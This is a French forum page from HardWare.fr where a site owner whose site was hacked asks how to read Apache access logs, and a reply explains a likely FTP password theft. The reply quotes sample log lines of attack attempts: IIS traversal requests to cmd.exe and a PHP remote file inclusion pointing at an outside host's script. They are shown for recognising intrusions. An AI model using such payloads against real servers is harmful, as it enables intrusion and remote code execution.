Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1919 connectés 

  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  [urgent, mon site: hacké] comment lire des fichiers acess_log ?

 
 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[urgent, mon site: hacké] comment lire des fichiers acess_log ?

n°327752
ment@l
Posté le 15-11-2007 à 08:23:32  profilanswer
 
Voir ce message dans le sujet non filtré
 

Manaloup a écrit :

Une console d'admin en racine du serveur http, c'est pas malin malin :o
 
sinon, je pense sincèrement que les logs ftp te seront plus utiles que tes logs apache  [:totozzz]
surtout si on a piraté une machine client avec un backdoor vnc et que ton site est en html sans langage de prog derrière [:aloy] ton pirate a pompé les passwords de ton client ftp (c'est pas bien de les sauvegarder) et a du se connecter tout simplement... parce que remplacer des fichiers sur un apache sans cgi/php/perl derrière, c'est un peu dur ...  
 
Tu aurais eu une attaque par apache, ca ressemblerais plus a des trucs du genre .. (avec des codes 200 a la fin :o)
 
218.92.63.250 - - [28/Sep/2006:17:16:17 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:19 +0200] "GET /scripts/root.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:20 +0200] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:46 +0200] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:47 +0200] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 404 -
210.245.226.61 - - [24/Mar/2007:13:01:02 +0100] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 232


 
merci pour ton aide manaloup
 
pour la console d'admin a la racine du site, je crois que c'est nexlink, l'hebergeur qui decide ce genre de chose, non?
 
pour les logs, c'est les seuls que j'ai trouvé sur la console d'admin, et nexlink sont pas tres conciliants, surtout quand ils sentent qu'ils ont affaire  a un newb
 
le backdoor vnc, comment j'ai pu le choper, a il kek chose a voir avec ultravnc (que j'utilise)
 
merci pour le conseil cocernant le mot de passe ftp, je l'applique illico
 
pour ce qui est du log que j'ai affiché , le post index par la console d'admin a 16H46, est ce que tu pense que c'est mon pirate ?

mood
Publicité
Posté le 15-11-2007 à 08:23:32  profilanswer
 

mood
Publicité
Posté le   profilanswer
 


Aller à :
  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Hébergement

  [urgent, mon site: hacké] comment lire des fichiers acess_log ?

 

Sujets relatifs
Probleme connexion neuf telecom!quel logiciel pour créer site web ?
hebergement siteServeur mail et site different => risque d'etre considere comme spam?
Réseau local - Internet partagé mais pas les fichierslire une video par internet
Mentions légales pour site webProbléme connexion Wifi avec Freebox
Probléme telechargement : fichiers corrompusConnection limité ou inexistante urgent
Plus de sujets relatifs à : [urgent, mon site: hacké] comment lire des fichiers acess_log ?

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.039 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR